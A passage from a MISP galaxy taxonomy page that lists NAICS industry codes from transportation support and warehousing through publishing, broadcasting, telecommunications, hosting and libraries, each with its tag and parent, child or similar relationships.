  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488330" with estimative-language:likelihood-probability="likely"

488330

Navigational Services to Shipping

The tag is: misp-galaxy:naics="488330"

488330 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48833" with estimative-language:likelihood-probability="likely"

48839

Other Support Activities for Water Transportation

The tag is: misp-galaxy:naics="48839"

48839 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488390" with estimative-language:likelihood-probability="likely"

488390

Other Support Activities for Water Transportation

The tag is: misp-galaxy:naics="488390"

488390 has relationships with:

  • child-of: misp-galaxy:naics="4883" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48839" with estimative-language:likelihood-probability="likely"

4884

Support Activities for Road Transportation

The tag is: misp-galaxy:naics="4884"

4884 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48841" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488410" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48849" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488490" with estimative-language:likelihood-probability="likely"

48841

Motor Vehicle Towing

The tag is: misp-galaxy:naics="48841"

48841 has relationships with:

  • child-of: misp-galaxy:naics="4884" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488410" with estimative-language:likelihood-probability="likely"

488410

Motor Vehicle Towing

The tag is: misp-galaxy:naics="488410"

488410 has relationships with:

  • child-of: misp-galaxy:naics="4884" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48841" with estimative-language:likelihood-probability="likely"

48849

Other Support Activities for Road Transportation

The tag is: misp-galaxy:naics="48849"

48849 has relationships with:

  • child-of: misp-galaxy:naics="4884" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488490" with estimative-language:likelihood-probability="likely"

488490

Other Support Activities for Road Transportation

The tag is: misp-galaxy:naics="488490"

488490 has relationships with:

  • child-of: misp-galaxy:naics="4884" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48849" with estimative-language:likelihood-probability="likely"

4885

Freight Transportation Arrangement

The tag is: misp-galaxy:naics="4885"

4885 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48851" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488510" with estimative-language:likelihood-probability="likely"

48851

Freight Transportation Arrangement

The tag is: misp-galaxy:naics="48851"

48851 has relationships with:

  • child-of: misp-galaxy:naics="4885" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="488510" with estimative-language:likelihood-probability="likely"

488510

Freight Transportation Arrangement

The tag is: misp-galaxy:naics="488510"

488510 has relationships with:

  • child-of: misp-galaxy:naics="4885" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="48851" with estimative-language:likelihood-probability="likely"

4889

Other Support Activities for Transportation

The tag is: misp-galaxy:naics="4889"

4889 has relationships with:

  • child-of: misp-galaxy:naics="488" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="48899" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="488999" with estimative-language:likelihood-probability="likely"

48899

Other Support Activities for Transportation

The tag is: misp-galaxy:naics="48899"

48899 has relationships with:

  • child-of: misp-galaxy:naics="4889" with estimative-language:likelihood-probability="likely"

488991

Packing and Crating

The tag is: misp-galaxy:naics="488991"

488991 has relationships with:

  • child-of: misp-galaxy:naics="4889" with estimative-language:likelihood-probability="likely"

488999

All Other Support Activities for Transportation

The tag is: misp-galaxy:naics="488999"

488999 has relationships with:

  • child-of: misp-galaxy:naics="4889" with estimative-language:likelihood-probability="likely"

491

Postal Service

The tag is: misp-galaxy:naics="491"

491 has relationships with:

  • parent-of: misp-galaxy:naics="4911" with estimative-language:likelihood-probability="likely"

4911

Postal Service

The tag is: misp-galaxy:naics="4911"

4911 has relationships with:

  • child-of: misp-galaxy:naics="491" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="491110" with estimative-language:likelihood-probability="likely"

49111

Postal Service

The tag is: misp-galaxy:naics="49111"

49111 has relationships with:

  • child-of: misp-galaxy:naics="4911" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="491110" with estimative-language:likelihood-probability="likely"

491110

Postal Service

The tag is: misp-galaxy:naics="491110"

491110 has relationships with:

  • child-of: misp-galaxy:naics="4911" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49111" with estimative-language:likelihood-probability="likely"

492

Couriers and Messengers

The tag is: misp-galaxy:naics="492"

492 has relationships with:

  • parent-of: misp-galaxy:naics="4921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4922" with estimative-language:likelihood-probability="likely"

4921

Couriers and Express Delivery Services

The tag is: misp-galaxy:naics="4921"

4921 has relationships with:

  • child-of: misp-galaxy:naics="492" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="492110" with estimative-language:likelihood-probability="likely"

49211

Couriers and Express Delivery Services

The tag is: misp-galaxy:naics="49211"

49211 has relationships with:

  • child-of: misp-galaxy:naics="4921" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="492110" with estimative-language:likelihood-probability="likely"

492110

Couriers and Express Delivery Services

The tag is: misp-galaxy:naics="492110"

492110 has relationships with:

  • child-of: misp-galaxy:naics="4921" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49211" with estimative-language:likelihood-probability="likely"

4922

Local Messengers and Local Delivery

The tag is: misp-galaxy:naics="4922"

4922 has relationships with:

  • child-of: misp-galaxy:naics="492" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49221" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="492210" with estimative-language:likelihood-probability="likely"

49221

Local Messengers and Local Delivery

The tag is: misp-galaxy:naics="49221"

49221 has relationships with:

  • child-of: misp-galaxy:naics="4922" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="492210" with estimative-language:likelihood-probability="likely"

492210

Local Messengers and Local Delivery

The tag is: misp-galaxy:naics="492210"

492210 has relationships with:

  • child-of: misp-galaxy:naics="4922" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49221" with estimative-language:likelihood-probability="likely"

493

Warehousing and Storage

The tag is: misp-galaxy:naics="493"

493 has relationships with:

  • parent-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

4931

Warehousing and Storage

The tag is: misp-galaxy:naics="4931"

4931 has relationships with:

  • child-of: misp-galaxy:naics="493" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="493110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="493120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="493130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="49319" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="493190" with estimative-language:likelihood-probability="likely"

49311

General Warehousing and Storage

The tag is: misp-galaxy:naics="49311"

49311 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="493110" with estimative-language:likelihood-probability="likely"

493110

General Warehousing and Storage

The tag is: misp-galaxy:naics="493110"

493110 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49311" with estimative-language:likelihood-probability="likely"

49312

Refrigerated Warehousing and Storage

The tag is: misp-galaxy:naics="49312"

49312 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="493120" with estimative-language:likelihood-probability="likely"

493120

Refrigerated Warehousing and Storage

The tag is: misp-galaxy:naics="493120"

493120 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49312" with estimative-language:likelihood-probability="likely"

49313

Farm Product Warehousing and Storage

The tag is: misp-galaxy:naics="49313"

49313 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="493130" with estimative-language:likelihood-probability="likely"

493130

Farm Product Warehousing and Storage

The tag is: misp-galaxy:naics="493130"

493130 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49313" with estimative-language:likelihood-probability="likely"

49319

Other Warehousing and Storage

The tag is: misp-galaxy:naics="49319"

49319 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="493190" with estimative-language:likelihood-probability="likely"

493190

Other Warehousing and Storage

The tag is: misp-galaxy:naics="493190"

493190 has relationships with:

  • child-of: misp-galaxy:naics="4931" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="49319" with estimative-language:likelihood-probability="likely"

51

Information

The tag is: misp-galaxy:naics="51"

51 has relationships with:

  • parent-of: misp-galaxy:naics="512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="516" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="518" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="519" with estimative-language:likelihood-probability="likely"

512

Motion Picture and Sound Recording Industries

The tag is: misp-galaxy:naics="512"

512 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

5121

Motion Picture and Video Industries

The tag is: misp-galaxy:naics="5121"

5121 has relationships with:

  • child-of: misp-galaxy:naics="512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51213" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512132" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51219" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512199" with estimative-language:likelihood-probability="likely"

51211

Motion Picture and Video Production

The tag is: misp-galaxy:naics="51211"

51211 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512110" with estimative-language:likelihood-probability="likely"

512110

Motion Picture and Video Production

The tag is: misp-galaxy:naics="512110"

512110 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51211" with estimative-language:likelihood-probability="likely"

51212

Motion Picture and Video Distribution

The tag is: misp-galaxy:naics="51212"

51212 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512120" with estimative-language:likelihood-probability="likely"

512120

Motion Picture and Video Distribution

The tag is: misp-galaxy:naics="512120"

512120 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51212" with estimative-language:likelihood-probability="likely"

51213

Motion Picture and Video Exhibition

The tag is: misp-galaxy:naics="51213"

51213 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

512131

Motion Picture Theaters (except Drive-Ins)

The tag is: misp-galaxy:naics="512131"

512131 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

512132

Drive-In Motion Picture Theaters

The tag is: misp-galaxy:naics="512132"

512132 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

51219

Postproduction Services and Other Motion Picture and Video Industries

The tag is: misp-galaxy:naics="51219"

51219 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

512191

Teleproduction and Other Postproduction Services

The tag is: misp-galaxy:naics="512191"

512191 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

512199

Other Motion Picture and Video Industries

The tag is: misp-galaxy:naics="512199"

512199 has relationships with:

  • child-of: misp-galaxy:naics="5121" with estimative-language:likelihood-probability="likely"

5122

Sound Recording Industries

The tag is: misp-galaxy:naics="5122"

5122 has relationships with:

  • child-of: misp-galaxy:naics="512" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51223" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512230" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51224" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512240" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51225" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512250" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51229" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="512290" with estimative-language:likelihood-probability="likely"

51223

Music Publishers

The tag is: misp-galaxy:naics="51223"

51223 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512230" with estimative-language:likelihood-probability="likely"

512230

Music Publishers

The tag is: misp-galaxy:naics="512230"

512230 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51223" with estimative-language:likelihood-probability="likely"

51224

Sound Recording Studios

The tag is: misp-galaxy:naics="51224"

51224 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512240" with estimative-language:likelihood-probability="likely"

512240

Sound Recording Studios

The tag is: misp-galaxy:naics="512240"

512240 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51224" with estimative-language:likelihood-probability="likely"

51225

Record Production and Distribution

The tag is: misp-galaxy:naics="51225"

51225 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512250" with estimative-language:likelihood-probability="likely"

512250

Record Production and Distribution

The tag is: misp-galaxy:naics="512250"

512250 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51225" with estimative-language:likelihood-probability="likely"

51229

Other Sound Recording Industries

The tag is: misp-galaxy:naics="51229"

51229 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="512290" with estimative-language:likelihood-probability="likely"

512290

Other Sound Recording Industries

The tag is: misp-galaxy:naics="512290"

512290 has relationships with:

  • child-of: misp-galaxy:naics="5122" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51229" with estimative-language:likelihood-probability="likely"

513

Publishing Industries

The tag is: misp-galaxy:naics="513"

513 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5132" with estimative-language:likelihood-probability="likely"

5131

Newspaper, Periodical, Book, and Directory Publishers

The tag is: misp-galaxy:naics="5131"

5131 has relationships with:

  • child-of: misp-galaxy:naics="513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513140" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51319" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513191" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513199" with estimative-language:likelihood-probability="likely"

51311

Newspaper Publishers

The tag is: misp-galaxy:naics="51311"

51311 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="513110" with estimative-language:likelihood-probability="likely"

513110

Newspaper Publishers

The tag is: misp-galaxy:naics="513110"

513110 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51311" with estimative-language:likelihood-probability="likely"

51312

Periodical Publishers

The tag is: misp-galaxy:naics="51312"

51312 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="513120" with estimative-language:likelihood-probability="likely"

513120

Periodical Publishers

The tag is: misp-galaxy:naics="513120"

513120 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51312" with estimative-language:likelihood-probability="likely"

51313

Book Publishers

The tag is: misp-galaxy:naics="51313"

51313 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="513130" with estimative-language:likelihood-probability="likely"

513130

Book Publishers

The tag is: misp-galaxy:naics="513130"

513130 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51313" with estimative-language:likelihood-probability="likely"

51314

Directory and Mailing List Publishers

The tag is: misp-galaxy:naics="51314"

51314 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="513140" with estimative-language:likelihood-probability="likely"

513140

Directory and Mailing List Publishers

The tag is: misp-galaxy:naics="513140"

513140 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51314" with estimative-language:likelihood-probability="likely"

51319

Other Publishers

The tag is: misp-galaxy:naics="51319"

51319 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

513191

Greeting Card Publishers

The tag is: misp-galaxy:naics="513191"

513191 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

513199

All Other Publishers

The tag is: misp-galaxy:naics="513199"

513199 has relationships with:

  • child-of: misp-galaxy:naics="5131" with estimative-language:likelihood-probability="likely"

5132

Software Publishers

The tag is: misp-galaxy:naics="5132"

5132 has relationships with:

  • child-of: misp-galaxy:naics="513" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="513210" with estimative-language:likelihood-probability="likely"

51321

Software Publishers

The tag is: misp-galaxy:naics="51321"

51321 has relationships with:

  • child-of: misp-galaxy:naics="5132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="513210" with estimative-language:likelihood-probability="likely"

513210

Software Publishers

The tag is: misp-galaxy:naics="513210"

513210 has relationships with:

  • child-of: misp-galaxy:naics="5132" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51321" with estimative-language:likelihood-probability="likely"

516

Broadcasting and Content Providers

The tag is: misp-galaxy:naics="516"

516 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5161" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5162" with estimative-language:likelihood-probability="likely"

5161

Radio and Television Broadcasting Stations

The tag is: misp-galaxy:naics="5161"

5161 has relationships with:

  • child-of: misp-galaxy:naics="516" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="516110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51612" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="516120" with estimative-language:likelihood-probability="likely"

51611

Radio Broadcasting Stations

The tag is: misp-galaxy:naics="51611"

51611 has relationships with:

  • child-of: misp-galaxy:naics="5161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="516110" with estimative-language:likelihood-probability="likely"

516110

Radio Broadcasting Stations

The tag is: misp-galaxy:naics="516110"

516110 has relationships with:

  • child-of: misp-galaxy:naics="5161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51611" with estimative-language:likelihood-probability="likely"

51612

Television Broadcasting Stations

The tag is: misp-galaxy:naics="51612"

51612 has relationships with:

  • child-of: misp-galaxy:naics="5161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="516120" with estimative-language:likelihood-probability="likely"

516120

Television Broadcasting Stations

The tag is: misp-galaxy:naics="516120"

516120 has relationships with:

  • child-of: misp-galaxy:naics="5161" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51612" with estimative-language:likelihood-probability="likely"

5162

Media Streaming Distribution Services, Social Networks, and Other Media Networks and Content Providers

The tag is: misp-galaxy:naics="5162"

5162 has relationships with:

  • child-of: misp-galaxy:naics="516" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51621" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="516210" with estimative-language:likelihood-probability="likely"

51621

Media Streaming Distribution Services, Social Networks, and Other Media Networks and Content Providers

The tag is: misp-galaxy:naics="51621"

51621 has relationships with:

  • child-of: misp-galaxy:naics="5162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="516210" with estimative-language:likelihood-probability="likely"

516210

Media Streaming Distribution Services, Social Networks, and Other Media Networks and Content Providers

The tag is: misp-galaxy:naics="516210"

516210 has relationships with:

  • child-of: misp-galaxy:naics="5162" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51621" with estimative-language:likelihood-probability="likely"

517

Telecommunications

The tag is: misp-galaxy:naics="517"

517 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5174" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5178" with estimative-language:likelihood-probability="likely"

5171

Wired and Wireless Telecommunications (except Satellite)

The tag is: misp-galaxy:naics="5171"

5171 has relationships with:

  • child-of: misp-galaxy:naics="517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517111" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517122" with estimative-language:likelihood-probability="likely"

51711

Wired and Wireless Telecommunications Carriers (except Satellite)

The tag is: misp-galaxy:naics="51711"

51711 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

517111

Wired Telecommunications Carriers

The tag is: misp-galaxy:naics="517111"

517111 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

517112

Wireless Telecommunications Carriers (except Satellite)

The tag is: misp-galaxy:naics="517112"

517112 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

51712

Telecommunications Resellers and Agents for Wireless Telecommunication Services

The tag is: misp-galaxy:naics="51712"

51712 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

517121

Telecommunications Resellers

The tag is: misp-galaxy:naics="517121"

517121 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

517122

Agents for Wireless Telecommunications Services

The tag is: misp-galaxy:naics="517122"

517122 has relationships with:

  • child-of: misp-galaxy:naics="5171" with estimative-language:likelihood-probability="likely"

5174

Satellite Telecommunications

The tag is: misp-galaxy:naics="5174"

5174 has relationships with:

  • child-of: misp-galaxy:naics="517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51741" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517410" with estimative-language:likelihood-probability="likely"

51741

Satellite Telecommunications

The tag is: misp-galaxy:naics="51741"

51741 has relationships with:

  • child-of: misp-galaxy:naics="5174" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="517410" with estimative-language:likelihood-probability="likely"

517410

Satellite Telecommunications

The tag is: misp-galaxy:naics="517410"

517410 has relationships with:

  • child-of: misp-galaxy:naics="5174" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51741" with estimative-language:likelihood-probability="likely"

5178

All Other Telecommunications

The tag is: misp-galaxy:naics="5178"

5178 has relationships with:

  • child-of: misp-galaxy:naics="517" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51781" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="517810" with estimative-language:likelihood-probability="likely"

51781

All Other Telecommunications

The tag is: misp-galaxy:naics="51781"

51781 has relationships with:

  • child-of: misp-galaxy:naics="5178" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="517810" with estimative-language:likelihood-probability="likely"

517810

All Other Telecommunications

The tag is: misp-galaxy:naics="517810"

517810 has relationships with:

  • child-of: misp-galaxy:naics="5178" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51781" with estimative-language:likelihood-probability="likely"

518

Computing Infrastructure Providers, Data Processing, Web Hosting, and Related Services

The tag is: misp-galaxy:naics="518"

518 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5182" with estimative-language:likelihood-probability="likely"

5182

Computing Infrastructure Providers, Data Processing, Web Hosting, and Related Services

The tag is: misp-galaxy:naics="5182"

5182 has relationships with:

  • child-of: misp-galaxy:naics="518" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51821" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="518210" with estimative-language:likelihood-probability="likely"

51821

Computing Infrastructure Providers, Data Processing, Web Hosting, and Related Services

The tag is: misp-galaxy:naics="51821"

51821 has relationships with:

  • child-of: misp-galaxy:naics="5182" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="518210" with estimative-language:likelihood-probability="likely"

518210

Computing Infrastructure Providers, Data Processing, Web Hosting, and Related Services

The tag is: misp-galaxy:naics="518210"

518210 has relationships with:

  • child-of: misp-galaxy:naics="5182" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="51821" with estimative-language:likelihood-probability="likely"

519

Web Search Portals, Libraries, Archives, and Other Information Services

The tag is: misp-galaxy:naics="519"

519 has relationships with:

  • child-of: misp-galaxy:naics="51" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="5192" with estimative-language:likelihood-probability="likely"

5192

Web Search Portals, Libraries, Archives, and Other Information Services

The tag is: misp-galaxy:naics="5192"

5192 has relationships with:

  • child-of: misp-galaxy:naics="519" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51921" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="519210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="51929" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="519290" with estimative-language:likelihood-probability="likely"

51921

Libraries and Archives

The tag is: misp-galaxy:naics="51921"

51921 has relationships with:

  • child-of: misp-galaxy:naics="5192" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="519210" with estimative-language:likelihood-probability="likely"

519210

Libraries and Archives

The tag is: misp-galaxy:naics="519210"

519210 has relationships with:

  • child-of: misp-galaxy:naics="5192" with estimative-language:likelihood-probability="likely"

